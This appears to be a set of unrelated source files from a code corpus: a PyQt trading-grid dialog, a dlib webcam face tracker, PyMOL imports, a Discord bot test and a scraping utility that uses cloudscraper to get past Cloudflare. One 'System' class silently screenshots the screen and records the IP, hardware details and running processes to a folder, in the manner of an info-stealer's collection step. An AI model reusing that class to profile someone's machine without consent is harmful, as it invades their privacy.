close_price = self.spinClosePrice.value()
if open_price == close_price:
self.log(u'开仓价和平仓价不能相同')
return
order_volume = self.spinOrderVolume.value()
grid = CtaGrid(direction=direction,
openprice=open_price,
closeprice=close_price,
volume=order_volume)
grid.reuse = self.reuseStatus.isChecked()
if direction == DIRECTION_LONG:
self.strategy.gt.dnGrids.append(grid)
else:
self.strategy.gt.upGrids.append(grid)
self.strategy.gt.save(direction=direction)
self.strategy.recheckPositions = True
grids_info = self.strategy.gt.toStr(direction=direction)
self.log(grids_info)
def displayGrids(self):
up_grids_info = self.strategy.gt.toStr(direction=DIRECTION_SHORT)
self.log(up_grids_info)
dn_grids_info = self.strategy.gt.toStr(direction=DIRECTION_LONG)
self.log(dn_grids_info)
def spinOpenPrice_valueChanged(self):
"""查询网格"""
if self.ctaEngine is None:
self.log(u'没有连接CTA引擎')
return
if self.strategy is None:
self.log(u'没有连接策略')
return
direction = self.gridDirection.currentText()
if direction is None or len(direction) == 0:
self.log(u'先选择方向');
return
open_price = self.spinOpenPrice.value()
grid = self.strategy.gt.getGrid(direction=direction, openPrice=open_price, t=u'OpenPrice')
if grid is None:
self.log(u'没有找到{0}方向的网格:{1}'.format(direction, open_price))
return
self.spinClosePrice.setValue(grid.closePrice)
self.spinOrderVolume.setValue(grid.volume)
self.spinTradedVolume.setValue(grid.tradedVolume)
self.openStatus.setChecked(grid.openStatus)
self.orderStatus.setChecked(grid.orderStatus)
self.closeStatus.setChecked(grid.closeStatus)
self.reuseStatus.setChecked(grid.reuse)
def btnUpdateGridClick(self):
"""更新网格"""
if self.ctaEngine is None:
self.log(u'没有连接CTA引擎')
return
if self.strategy is None:
self.log(u'没有连接策略')
return
direction = self.gridDirection.currentText()
if direction is None or len(direction) ==0:
self.log(u'先选择方向')
return
open_price = self.spinOpenPrice.value()
grid = self.strategy.gt.getGrid(direction=direction, openPrice=open_price, t=u'OpenPrice')
if grid is None:
self.log(u'没有找到{0}方向的网格:{1}'.format(direction,open_price))
return
grid.openPrice = open_price
grid.closePrice = self.spinClosePrice.value()
grid.volume = self.spinOrderVolume.value()
grid.tradedVolume = self.spinTradedVolume.value()
grid.openStatus = self.openStatus.isChecked()
grid.orderStatus = self.orderStatus.isChecked()
grid.closeStatus = self.closeStatus.isChecked()
grid.reuse = self.reuseStatus.isChecked()
self.strategy.gt.save(direction=direction)
self.strategy.recheckPositions = True
self.displayGrids()
def btnRemoveGridClick(self):
"""删除网格(指定开仓价以下的废格)"""
if self.ctaEngine is None:
self.log(u'没有连接CTA引擎')
return
if self.strategy is None:
self.log(u'没有连接策略')
return
direction = self.gridDirection.currentText()
if direction is None or len(direction) == 0:
self.log(u'先选择方向')
return
open_price = self.spinOpenPrice.value()
if (direction == DIRECTION_LONG and len(self.strategy.gt.dnGrids) < 2) or \
(direction == DIRECTION_SHORT and len(self.strategy.gt.upGrids) < 2):
self.log(u'{0}方向的网格只有一个,不能删除'.format(direction))
return
grid = self.strategy.gt.getGrid(direction=direction, openPrice=open_price, t=u'OpenPrice')
if grid is None:
self.log(u'没有找到{0}方向的网格:{1},删除{1}范围内的非开仓网格'.format(direction, open_price))
self.strategy.gt.removeGrids(direction=direction, priceline=open_price)
self.strategy.gt.save(direction=direction)
self.log(u'成功移除{0}方向{1}以内网格'.format(direction, open_price))
self.displayGrids()
return
if grid.id is not None:
self.strategy.gt.removeGridById(direction=direction,id= grid.id)
self.log(u'成功移除{0}方向的网格:{1}'.format(direction, open_price))
self.strategy.gt.save(direction=direction)
self.displayGrids()
def btnRemoveAllClick(self):
"""删除所有网格"""
if self.ctaEngine is None:
self.log(u'没有连接CTA引擎')
return
if self.strategy is None:
self.log(u'没有连接策略')
return
direction = self.gridDirection.currentText()
if direction is None or len(direction) == 0:
self.log(u'先选择方向')
return
if direction == DIRECTION_LONG:
self.strategy.gt.dnGrids = self.strategy.gt.dnGrids [-1:]
self.strategy.gt.save(direction=direction)
self.log(u'成功移除{0}方向的网格,只保留最后一个'.format(direction))
else:
self.strategy.gt.upGrids = self.strategy.gt.dnGrids [-1:]
self.strategy.gt.save(direction=direction)
self.log(u'成功移除{0}方向的网格,只保留最后一个'.format(direction))
self.displayGrids()
def log(self, content):
self.logMsgs.append(content)
|
the-stack_0_19882 | import threading
import time
import argparse
import cv2
import json
import os
import numpy as np
import dlib
from itertools import chain
config_data = {}
should_face_tracking_be_paused = False
detector = dlib.get_frontal_face_detector()
def set_config_data(data_in):
global config_data
config_data = data_in
def locate_main_face(img):
dets = detector(img, 0)
if not dets:
return None
return max(dets, key=lambda det: (det.right() - det.left()) * (det.bottom() - det.top()))
def extract_face_landmarks(img, face_location):
landmark_shape = predictor(img, face_location)
face_landmarks = []
for i in range(68):
pos = landmark_shape.part(i)
face_landmarks.append(np.array([pos.x, pos.y], dtype=np.float32))
return face_landmarks
def generate_face_identifiers(face_landmarks):
def get_center(array_in):
return sum([face_landmarks[i] for i in array_in]) / len(array_in)
left_eyebrow = [18, 19, 20, 21]
right_eyebrow = [22, 23, 24, 25]
chin = [6, 7, 8, 9, 10]
nose = [29, 30]
return get_center(left_eyebrow + right_eyebrow), get_center(chin), get_center(nose)
def get_face_orientation(face_identifiers):
center_of_eyebrows, center_of_chin, center_of_nose = face_identifiers
middle_line = center_of_eyebrows - center_of_chin
hypotenuse = center_of_eyebrows - center_of_nose
horizontal_rotation_val = np.cross(middle_line, hypotenuse) / np.linalg.norm(middle_line) ** 2
vertical_rotation_val = middle_line @ hypotenuse / np.linalg.norm(middle_line) ** 2
return np.array([horizontal_rotation_val, vertical_rotation_val])
cam_capture_count = 0
_cam_capture_count_ = 0
cam_fps_count_start_time = time.time()
fps_count_interval = 5
def get_face_orientation_from_picture(img):
global eye_height, _cam_capture_count_, cam_fps_count_start_time, cam_capture_count
global mouth_height
main_face_location = locate_main_face(img)
if not main_face_location:
return None
face_landmarks = extract_face_landmarks(img, main_face_location)
if config_data['debug']:
global debug_face_landmarks
debug_face_landmarks = face_landmarks
_cam_capture_count_ += 1
if time.time() - cam_fps_count_start_time >= fps_count_interval:
cam_fps_count_start_time = time.time()
cam_capture_count = _cam_capture_count_
_cam_capture_count_ = 0
key_points = face_landmarks
eye_height = -(key_points[37][1] - key_points[41][1] +
key_points[38][1] - key_points[40][1] +
key_points[43][1] - key_points[47][1] +
key_points[44][1] - key_points[46][1]
) / (key_points[45][0] - key_points[42][0] +
key_points[49][0] - key_points[36][0])
mouth_height = -(key_points[61][1] - key_points[67][1] +
key_points[62][1] - key_points[66][1] +
key_points[63][1] - key_points[65][1] +
key_points[51][1] - key_points[57][1]
) / (key_points[54][0] - key_points[48][0] +
key_points[64][0] - key_points[60][0])
face_identifiers = generate_face_identifiers(face_landmarks)
rotation_vals = get_face_orientation(face_identifiers)
return rotation_vals
face_orientation = None
cam_img = None
def camera_capture_loop():
while 'config_name' not in config_data:
time.sleep(0.1)
global predictor
global reference_face_orientation
global face_orientation
global current_eye_height
global current_mouth_height
global closed_mouth_height
global closed_eye_height
global open_mouth_height
global open_eye_height
global eye_height_step
global mouth_height_step
predictor = dlib.shape_predictor(config_data['face_landmarks_path'])
reference_face_orientation = get_face_orientation_from_picture(cv2.imread(config_data['std_face_open_image_path']))
face_orientation = reference_face_orientation - reference_face_orientation
current_eye_height = open_eye_height = eye_height
current_mouth_height = open_mouth_height = mouth_height
get_face_orientation_from_picture(cv2.imread(config_data['std_face_closed_image_path']))
closed_mouth_height = eye_height
closed_eye_height = mouth_height
eye_height_step = (open_eye_height - closed_eye_height) / (len(config_data['psd_eye_layers']) - 1)
mouth_height_step = (open_mouth_height - closed_mouth_height) / (len(config_data['psd_mouth_layers']) - 1)
cap = cv2.VideoCapture(config_data['camera_path'])
while True:
if should_face_tracking_be_paused:
time.sleep(0.1)
global cam_img
ret, cam_img = cap.read()
new_face_orientation = get_face_orientation_from_picture(cam_img)
current_eye_height = eye_height
current_mouth_height = mouth_height
if new_face_orientation is not None:
face_orientation = new_face_orientation - reference_face_orientation
def debug_draw_line(img, start_point_idx, end_point_idx, color):
cv2.line(img,
(int(debug_face_landmarks[start_point_idx][0]), int(debug_face_landmarks[start_point_idx][1])),
(int(debug_face_landmarks[end_point_idx][0]), int(debug_face_landmarks[end_point_idx][1])),
color,
3)
def draw_outlined_text(img, text, point, color):
cv2.putText(img,
text,
point,
cv2.FONT_HERSHEY_SIMPLEX,
1,
(0, 0, 0),
6)
cv2.putText(img,
text,
point,
cv2.FONT_HERSHEY_SIMPLEX,
1,
color,
2)
character_render_count = 0
_character_render_count_ = 0
render_fps_count_start_time = time.time()
def get_debug_camera_image():
global cam_capture_count, fps_count_interval, character_render_count, _character_render_count_, start_time, render_fps_count_start_time
_character_render_count_ += 1
if time.time() - render_fps_count_start_time >= fps_count_interval:
render_fps_count_start_time = time.time()
character_render_count = _character_render_count_
_character_render_count_ = 0
debug_cam_img = cam_img.copy()
color = (255, 255, 255)
for i in chain(range(0, 16), range(36, 41), range(42, 47), range(48, 60), range(27, 30), range(31, 35),
range(17, 21), range(22, 26)):
debug_draw_line(debug_cam_img, i, i + 1, color)
debug_draw_line(debug_cam_img, 36, 41, color)
debug_draw_line(debug_cam_img, 42, 47, color)
for i, (px, py) in enumerate(debug_face_landmarks):
cv2.rectangle(debug_cam_img, (int(px), int(py) - 7), (int(px) + 10, int(py) + 3), (0, 0, 0), -1)
for i, (px, py) in enumerate(debug_face_landmarks):
cv2.putText(debug_cam_img, str(i), (int(px), int(py)), cv2.FONT_HERSHEY_COMPLEX, 0.25, (0, 255, 255))
cv2.putText(debug_cam_img,
'Main face',
(int(debug_face_landmarks[0][0] - 10),
int(debug_face_landmarks[24][1] - debug_face_landmarks[30][1] + debug_face_landmarks[27][1] - 5)),
cv2.FONT_HERSHEY_COMPLEX,
0.5,
(0, 255, 0))
cv2.rectangle(debug_cam_img,
(int(debug_face_landmarks[0][0] - 10),
int(debug_face_landmarks[24][1] - debug_face_landmarks[30][1] + debug_face_landmarks[27][1])),
(int(debug_face_landmarks[16][0] + 15),
int(debug_face_landmarks[8][1] + 10)),
(0, 255, 0),
1)
draw_outlined_text(debug_cam_img,
'Capture FPS: %.1f' % (cam_capture_count / fps_count_interval),
(20, 40),
(0, 255, 0))
draw_outlined_text(debug_cam_img,
'Render FPS: %.1f' % (character_render_count / fps_count_interval),
(20, 80),
(0, 255, 0))
draw_outlined_text(debug_cam_img,
'Eye Size: %d %s' % (get_current_eye_size(),
'' if get_current_eye_size() < len(config_data['psd_eye_layers']) - 1
else '(max)'),
(20, 120),
(0, 255, 0))
draw_outlined_text(debug_cam_img,
'Mouth Size: %d %s' % (get_current_mouth_size(),
'' if get_current_mouth_size() < len(config_data['psd_mouth_layers']) - 1
else '(max)'),
(20, 160),
(0, 255, 0))
draw_outlined_text(debug_cam_img,
'Face Orientation: [%.4f, %.4f]' % (face_orientation[0], face_orientation[1]),
(20, 200),
(0, 255, 0))
return debug_cam_img
def get_current_face_orientation():
return face_orientation
def get_camera_image():
return cam_img
def get_current_eye_size():
size = int((current_eye_height - closed_eye_height) / eye_height_step)
size = size if size < len(config_data['psd_eye_layers']) else len(config_data['psd_eye_layers']) - 1
return size if size >= 0 else 0
def get_current_mouth_size():
size = int((current_mouth_height - closed_mouth_height) / mouth_height_step)
size = size if size < len(config_data['psd_mouth_layers']) else len(config_data['psd_mouth_layers']) - 1
return size if size >= 0 else 0
def pause_face_tracker():
global should_face_tracking_be_paused
should_face_tracking_be_paused = True
def resume_face_tracker():
global should_face_tracking_be_paused
should_face_tracking_be_paused = False
t = threading.Thread(target=camera_capture_loop)
t.setDaemon(True)
t.start()
def dir_path(string):
if os.path.isfile(string):
return string
else:
raise NotADirectoryError(string)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('config',
type=dir_path,
help='path to the config file (json)')
args = parser.parse_args()
config_file = open(args.config, encoding='utf8')
config_data = json.load(config_file)
config_file.close()
config_data['debug'] = True
while get_camera_image() is None:
time.sleep(0.1)
while True:
cv2.imshow("Camera Debug", get_debug_camera_image())
cv2.waitKey(1)
|
the-stack_0_19883 | from mss import mss
from os import mkdir
from urllib3 import poolmanager
from win32com.client import GetObject
from ..utils.config import SystemConfig
class System:
def __init__(self, *args):
self.config = SystemConfig()
for index, variable in enumerate(self.config.Variables):
self.__dict__.update({variable: args[index]})
def __create_folder(self):
if any(self.statuses):
mkdir(rf"{self.storage_path}\{self.storage_folder}\{self.folder}")
def __create_screen(self):
if self.statuses[0] is True:
with mss() as screen:
screen.shot(mon=-1, output=rf"{self.storage_path}\{self.storage_folder}\{self.folder}\Screenshot.png")
def __get_system_info(self):
if self.statuses[1] is True:
win_object = GetObject("winmgmts:root\\cimv2")
os_info = win_object.ExecQuery("Select * from Win32_OperatingSystem")[0]
net_info = poolmanager.PoolManager().request(method="GET", url=self.config.IPUrl).data.decode("utf-8")
cpu_info = win_object.ExecQuery("Select * from Win32_Processor")[0].Name
gpu_info = win_object.ExecQuery("Select * from Win32_VideoController")[0].Name
info = (
f"User: {self.config.User}\n",
f"IP: {net_info}\n",
f"OS Name: {os_info.Name.split('|')[0]}\n",
f"OS Version: {' '.join([os_info.Version, os_info.BuildNumber])}\n",
f"CPU: {cpu_info}\n",
f"GPU: {gpu_info}\n",
f"RAM: {round(float(os_info.TotalVisibleMemorySize) / 1048576)} GB\n"
)
with open(rf"{self.storage_path}\{self.storage_folder}\{self.folder}\Configuration.txt", "a", encoding="utf-8") as system:
for item in info:
system.write(item)
system.close()
def __get_system_processes(self):
if self.statuses[2] is True:
with open(rf"{self.storage_path}\{self.storage_folder}\{self.folder}\Processes.txt", "a", encoding="utf-8") as processes:
result = [process.Properties_('Name').Value for process in GetObject('winmgmts:').InstancesOf('Win32_Process')]
processes.write("\n".join(process for process in result))
processes.close()
def run(self):
try:
self.__create_folder()
self.__create_screen()
self.__get_system_info()
self.__get_system_processes()
except Exception as e:
if self.errors is True:
print(f"[SYSTEM]: {repr(e)}")
|
the-stack_0_19884 |
#--------------------------------------------------------------------
from .importing import \
filename_to_objectname, \
finish_object, \
load, \
loadall, \
load_brick, \
load_callback, \
load_cgo, \
load_coords, \
load_coordset, \
load_embedded, \
load_map, \
load_model, \
load_mtz, \
load_object, \
load_traj, \
load_raw, \
loadable, \
read_mmodstr, \
read_molstr, \
read_sdfstr, \
read_pdbstr, \
read_xplorstr, \
fetch, \
mda_load,\
mda_load_traj,\
mda_rmsd, \
mda_rmsf
# MPP ^
#--------------------------------------------------------------------
from . import creating
from .creating import \
copy, \
create, \
extract, \
fragment, \
group, \
gradient, \
isodot, \
isolevel, \
isomesh, \
isosurface, \
join_states, \
map_generate, \
map_new, \
pseudoatom, \
set_raw_alignment, \
slice_new, \
symexp, \
ramp_new, \
ramp_update, \
ungroup, \
volume
#--------------------------------------------------------------------
from .colorramping import \
volume_ramp_new, \
volume_panel, \
volume_color
#--------------------------------------------------------------------
from . import commanding
from .commanding import \
async_, \
cls, \
delete, \
do, \
log, \
log_close, \
log_open, \
quit, \
resume, \
splash, \
reinitialize, \
sync
#--------------------------------------------------------------------
from . import controlling
from .controlling import \
button, \
config_mouse, \
mouse, \
mask, \
order, \
set_key, \
unmask, \
edit_mode
#--------------------------------------------------------------------
from .querying import \
angle, \
auto_measure, \
centerofmass, \
count_atoms, \
count_frames, \
count_states, \
count_discrete, \
dist, \
dihedral, \
distance, \
find_pairs, \
get_angle, \
get_area, \
get_assembly_ids, \
get_bonds, \
get_chains, \
get_collada, \
get_color_index, \
get_color_indices, \
get_object_color_index, \
get_object_list, \
get_object_settings,\
get_object_state, \
get_color_tuple, \
get_atom_coords, \
get_coords, \
get_coordset, \
get_dihedral, \
get_distance, \
get_drag_object_name, \
get_extent, \
get_gltf, \
get_idtf, \
get_modal_draw, \
get_model, \
get_movie_locked, \
get_movie_length, \
get_names, \
get_names_of_type, \
get_legal_name, \
get_unused_name, \
get_object_matrix, \
get_object_ttt, \
get_mtl_obj, \
get_phipsi, \
get_position, \
get_povray, \
get_raw_alignment, \
get_renderer, \
get_selection_state,\
get_symmetry, \
get_title, \
get_type, \
get_version, \
get_volume_field, \
get_volume_histogram, \
get_vrml, \
id_atom, \
identify, \
index, \
overlap, \
pi_interactions, \
phi_psi
#--------------------------------------------------------------------
from .selecting import \
deselect, \
indicate, \
select, \
select_list, \
pop, \
mda_select
#--------------------------------------------------------------------
from . import exporting
from .exporting import \
copy_image, \
cache, \
get_str, \
get_bytes, \
get_pdbstr, \
get_cifstr, \
get_session, \
get_fastastr, \
multifilesave, \
multifilenamegen, \
multisave, \
png, \
mda_save
#--------------------------------------------------------------------
from . import editing
from .editing import \
add_bond, \
alter, \
alter_list, \
alter_state, \
alphatoall, \
attach, \
bond, \
copy_to, \
cycle_valence, \
deprotect, \
drag, \
dss, \
edit, \
fix_chemistry, \
flag, \
fuse, \
get_editor_scheme, \
h_add, \
h_fill, \
h_fix, \
invert, \
iterate, \
iterate_state, \
map_set, \
map_set_border, \
map_double, \
map_halve, \
map_trim, \
matrix_copy, \
matrix_reset, \
mse2met, \
pbc_unwrap, \
pbc_wrap, \
protect, \
push_undo, \
rebond, \
reference, \
redo, \
remove, \
remove_picked, \
rename, \
replace, \
rotate, \
sculpt_purge, \
sculpt_deactivate, \
sculpt_activate, \
sculpt_iterate, \
set_dihedral, \
set_name, \
set_geometry, \
set_object_color, \
set_object_ttt, \
set_state_order, \
set_symmetry, \
set_title, \
smooth, \
sort, \
split_chains, \
split_states, \
symmetry_copy, \
torsion, \
transform_object, \
transform_selection,\
translate, \
translate_atom, \
unbond, \
undo, \
uniquify, \
unpick, \
update, \
valence, \
vdw_fit
from .editor import \
fab
from .computing import \
clean
matrix_transfer = matrix_copy # legacy
#--------------------------------------------------------------------
from .externing import \
cd, \
ls, \
paste, \
pwd, \
system
#--------------------------------------------------------------------
from . import wizarding
from .wizarding import \
get_wizard, \
get_wizard_stack, \
refresh_wizard, \
replace_wizard, \
set_wizard, \
set_wizard_stack, \
dirty_wizard, \
wizard
#--------------------------------------------------------------------
from .fitting import \
align, \
alignto, \
extra_fit, \
fit, \
super, \
rms, \
rms_cur, \
intra_fit, \
intra_rms, \
intra_rms_cur, \
cealign, \
pair_fit
#--------------------------------------------------------------------
# ARE ALL OF THESE UNUSED AND/OR DEPRECATED (?)
from .preset import \
simple, \
technical, \
pretty, \
publication
#--------------------------------------------------------------------
from .morphing import \
morph
#--------------------------------------------------------------------
from . import moving
from .moving import \
madd, \
mcopy, \
mdelete, \
mmove, \
minsert, \
mset, \
mclear, \
mdo, \
mappend, \
mmatrix, \
mdump, \
accept, \
decline, \
mpng, \
mview, \
forward, \
backward, \
rewind, \
middle, \
ending, \
mplay, \
mtoggle, \
mstop, \
mpng, \
frame, \
get_movie_playing, \
set_frame, \
get_state, \
get_frame
#--------------------------------------------------------------------
from . import viewing
from .viewing import \
show_as, \
bg_color, \
bg_colour, \
cartoon, \
capture, \
clip, \
color, \
color_deep, \
colour, \
del_colorection, \
dirty, \
disable, \
draw, \
enable, \
full_screen, \
get_colorection, \
get_view, \
get_viewport, \
get_vis, \
get_scene_list, \
hide, \
ipython_image, \
label, \
label2, \
load_png, \
meter_reset, \
move, \
orient, \
origin, \
center, \
ray, \
rebuild, \
recolor, \
recolour, \
refresh, \
reset, \
rock, \
scene, \
scene_order, \
scene_recall_message, \
set_color, \
set_colour, \
set_colorection, \
set_vis, \
set_view, \
show, \
spectrum, \
stereo, \
toggle, \
turn, \
view, \
viewport, \
window, \
zoom
#--------------------------------------------------------------------
from . import setting
from .setting import \
set, \
set_bond, \
get_bond, \
get, \
unset, \
unset_bond, \
unset_deep, \
get_setting_boolean, \
get_setting_int, \
get_setting_float, \
get_setting_float as get_setting_legacy, \
get_setting_tuple, \
get_setting_updates, \
get_setting_text
#--------------------------------------------------------------------
from .parsing import \
run, \
spawn
#--------------------------------------------------------------------
from . import helping
from .helping import \
abort, \
api, \
show_help, \
help, \
help_setting, \
commands
#--------------------------------------------------------------------
from .keyboard import \
editing_ring
#--------------------------------------------------------------------
from .experimenting import \
check, \
dump, \
get_bond_print, \
fast_minimize, \
mem, \
minimize, \
spheroid, \
focal_blur, \
callout, \
desaturate, \
test
from .internal import \
download_chem_comp, \
file_read
from .util import \
get_sasa_relative
from .stereochemistry import \
assign_stereo
#--------------------------------------------------------------------
# Modules which contain programs used explicity as "module.xxx"
from . import util
from . import movie
from . import gui
|
the-stack_0_19887 | import pytest
from unittest.mock import AsyncMock, MagicMock, call
from discord_ritoman.bot.bot import bot
from discord_ritoman.bot.bot_command import GLOBAL_COMMAND_TABLE, bot_command
from discord_ritoman.utils import create_logger
logger = create_logger(__file__)
@pytest.mark.asyncio
async def test_bot_command_decorator():
"""
tests that the bot command decorator works correctly
"""
mock_logger = MagicMock()
@bot_command("mycommand")
class MyBotCommand:
@staticmethod
async def default(ctx, *args, **kwargs):
mock_logger("default")
await ctx.send("yes")
@staticmethod
async def option_one(ctx, *args, **kwargs):
mock_logger("option one")
count = 0
for command in bot.commands:
if command.name in GLOBAL_COMMAND_TABLE:
count += 1
assert count == len(GLOBAL_COMMAND_TABLE.items()) > 0
assert "testcommand" in GLOBAL_COMMAND_TABLE
assert "mycommand" in GLOBAL_COMMAND_TABLE
assert "testcommand" in bot.all_commands
assert "mycommand" in bot.all_commands
assert "denounce" in bot.all_commands
await MyBotCommand(AsyncMock(), "one", "four", 3)
await MyBotCommand(AsyncMock())
mock_logger.assert_has_calls(
[call("default"), call("option one")], any_order=True
)
def test_help_string_contained():
""""""
assert bot.all_commands["testcommand"].help == "this is a testing command"
|
the-stack_0_19888 | from os import replace
import requests
#import hashlib
from pathlib import Path
import secrets
import os.path
import os
import uuid
import json
import time
from lxml import etree
import re
import config
from urllib.parse import urljoin
import mechanicalsoup
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
from cloudscraper import create_scraper
from concurrent.futures import ThreadPoolExecutor
def getXpathSingle(htmlcode, xpath):
html = etree.fromstring(htmlcode, etree.HTMLParser())
result1 = str(html.xpath(xpath)).strip(" ['']")
return result1
G_USER_AGENT = r'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36'
# 网页请求核心
def get_html(url, cookies: dict = None, ua: str = None, return_type: str = None, encoding: str = None):
verify = config.getInstance().cacert_file()
configProxy = config.getInstance().proxy()
errors = ""
headers = {"User-Agent": ua or G_USER_AGENT} # noqa
for i in range(configProxy.retry):
try:
if configProxy.enable:
proxies = configProxy.proxies()
result = requests.get(str(url), headers=headers, timeout=configProxy.timeout, proxies=proxies, verify=verify,
cookies=cookies)
else:
result = requests.get(str(url), headers=headers, timeout=configProxy.timeout, cookies=cookies)
if return_type == "object":
return result
elif return_type == "content":
return result.content
else:
result.encoding = encoding or result.apparent_encoding
return result.text
except Exception as e:
print("[-]Connect retry {}/{}".format(i + 1, configProxy.retry))
errors = str(e)
if "getaddrinfo failed" in errors:
print("[-]Connect Failed! Please Check your proxy config")
debug = config.getInstance().debug()
if debug:
print("[-]" + errors)
else:
print("[-]" + errors)
print('[-]Connect Failed! Please check your Proxy or Network!')
raise Exception('Connect Failed')
def post_html(url: str, query: dict, headers: dict = None) -> requests.Response:
configProxy = config.getInstance().proxy()
errors = ""
headers_ua = {"User-Agent": G_USER_AGENT}
if headers is None:
headers = headers_ua
else:
headers.update(headers_ua)
for i in range(configProxy.retry):
try:
if configProxy.enable:
proxies = configProxy.proxies()
result = requests.post(url, data=query, proxies=proxies, headers=headers, timeout=configProxy.timeout)
else:
result = requests.post(url, data=query, headers=headers, timeout=configProxy.timeout)
return result
except Exception as e:
print("[-]Connect retry {}/{}".format(i + 1, configProxy.retry))
errors = str(e)
print("[-]Connect Failed! Please check your Proxy or Network!")
print("[-]" + errors)
G_DEFAULT_TIMEOUT = 10 # seconds
class TimeoutHTTPAdapter(HTTPAdapter):
def __init__(self, *args, **kwargs):
self.timeout = G_DEFAULT_TIMEOUT
if "timeout" in kwargs:
self.timeout = kwargs["timeout"]
del kwargs["timeout"]
super().__init__(*args, **kwargs)
def send(self, request, **kwargs):
timeout = kwargs.get("timeout")
if timeout is None:
kwargs["timeout"] = self.timeout
return super().send(request, **kwargs)
# with keep-alive feature
def get_html_session(url:str = None, cookies: dict = None, ua: str = None, return_type: str = None, encoding: str = None):
configProxy = config.getInstance().proxy()
session = requests.Session()
if isinstance(cookies, dict) and len(cookies):
requests.utils.add_dict_to_cookiejar(session.cookies, cookies)
retries = Retry(total=configProxy.retry, connect=configProxy.retry, backoff_factor=1, status_forcelist=[429, 500, 502, 503, 504])
session.mount("https://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
session.mount("http://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
if configProxy.enable:
session.verify = config.getInstance().cacert_file()
session.proxies = configProxy.proxies()
headers = {"User-Agent": ua or G_USER_AGENT}
session.headers = headers
try:
if isinstance(url, str) and len(url):
result = session.get(str(url))
else: # 空url参数直接返回可重用session对象,无需设置return_type
return session
if not result.ok:
return None
if return_type == "object":
return result
elif return_type == "content":
return result.content
elif return_type == "session":
return result, session
else:
result.encoding = encoding or "utf-8"
return result.text
except requests.exceptions.ProxyError:
print("[-]get_html_session() Proxy error! Please check your Proxy")
except Exception as e:
print(f"[-]get_html_session() failed. {e}")
return None
def get_html_by_browser(url:str = None, cookies: dict = None, ua: str = None, return_type: str = None, encoding: str = None, use_scraper: bool = False):
configProxy = config.getInstance().proxy()
s = create_scraper(browser={'custom': ua or G_USER_AGENT,}) if use_scraper else requests.Session()
if isinstance(cookies, dict) and len(cookies):
requests.utils.add_dict_to_cookiejar(s.cookies, cookies)
retries = Retry(total=configProxy.retry, connect=configProxy.retry, backoff_factor=1, status_forcelist=[429, 500, 502, 503, 504])
s.mount("https://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
s.mount("http://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
if configProxy.enable:
s.verify = config.getInstance().cacert_file()
s.proxies = configProxy.proxies()
try:
browser = mechanicalsoup.StatefulBrowser(user_agent=ua or G_USER_AGENT, session=s)
if isinstance(url, str) and len(url):
result = browser.open(url)
else:
return browser
if not result.ok:
return None
if return_type == "object":
return result
elif return_type == "content":
return result.content
elif return_type == "browser":
return result, browser
else:
result.encoding = encoding or "utf-8"
return result.text
except requests.exceptions.ProxyError:
print("[-]get_html_by_browser() Proxy error! Please check your Proxy")
except Exception as e:
print(f'[-]get_html_by_browser() Failed! {e}')
return None
def get_html_by_form(url, form_select: str = None, fields: dict = None, cookies: dict = None, ua: str = None, return_type: str = None, encoding: str = None):
configProxy = config.getInstance().proxy()
s = requests.Session()
if isinstance(cookies, dict) and len(cookies):
requests.utils.add_dict_to_cookiejar(s.cookies, cookies)
retries = Retry(total=configProxy.retry, connect=configProxy.retry, backoff_factor=1, status_forcelist=[429, 500, 502, 503, 504])
s.mount("https://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
s.mount("http://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
if configProxy.enable:
s.verify = config.getInstance().cacert_file()
s.proxies = configProxy.proxies()
try:
browser = mechanicalsoup.StatefulBrowser(user_agent=ua or G_USER_AGENT, session=s)
result = browser.open(url)
if not result.ok:
return None
form = browser.select_form() if form_select is None else browser.select_form(form_select)
if isinstance(fields, dict):
for k, v in fields.items():
browser[k] = v
response = browser.submit_selected()
if return_type == "object":
return response
elif return_type == "content":
return response.content
elif return_type == "browser":
return response, browser
else:
result.encoding = encoding or "utf-8"
return response.text
except requests.exceptions.ProxyError:
print("[-]get_html_by_form() Proxy error! Please check your Proxy")
except Exception as e:
print(f'[-]get_html_by_form() Failed! {e}')
return None
def get_html_by_scraper(url:str = None, cookies: dict = None, ua: str = None, return_type: str = None, encoding: str = None):
configProxy = config.getInstance().proxy()
session = create_scraper(browser={'custom': ua or G_USER_AGENT,})
if isinstance(cookies, dict) and len(cookies):
requests.utils.add_dict_to_cookiejar(session.cookies, cookies)
retries = Retry(total=configProxy.retry, connect=configProxy.retry, backoff_factor=1, status_forcelist=[429, 500, 502, 503, 504])
session.mount("https://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
session.mount("http://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
if configProxy.enable:
session.verify = config.getInstance().cacert_file()
session.proxies = configProxy.proxies()
try:
if isinstance(url, str) and len(url):
result = session.get(str(url))
else: # 空url参数直接返回可重用scraper对象,无需设置return_type
return session
if not result.ok:
return None
if return_type == "object":
return result
elif return_type == "content":
return result.content
elif return_type == "scraper":
return result, session
else:
result.encoding = encoding or "utf-8"
return result.text
except requests.exceptions.ProxyError:
print("[-]get_html_by_scraper() Proxy error! Please check your Proxy")
except Exception as e:
print(f"[-]get_html_by_scraper() failed. {e}")
return None
# def get_javlib_cookie() -> [dict, str]:
# import cloudscraper
# switch, proxy, timeout, retry_count, proxytype = config.getInstance().proxy()
# proxies = get_proxy(proxy, proxytype)
#
# raw_cookie = {}
# user_agent = ""
#
# # Get __cfduid/cf_clearance and user-agent
# for i in range(retry_count):
# try:
# if switch == 1 or switch == '1':
# raw_cookie, user_agent = cloudscraper.get_cookie_string(
# "http://www.javlibrary.com/",
# proxies=proxies
# )
# else:
# raw_cookie, user_agent = cloudscraper.get_cookie_string(
# "http://www.javlibrary.com/"
# )
# except requests.exceptions.ProxyError:
# print("[-] ProxyError, retry {}/{}".format(i + 1, retry_count))
# except cloudscraper.exceptions.CloudflareIUAMError:
# print("[-] IUAMError, retry {}/{}".format(i + 1, retry_count))
#
# return raw_cookie, user_agent
def translate(
src: str,
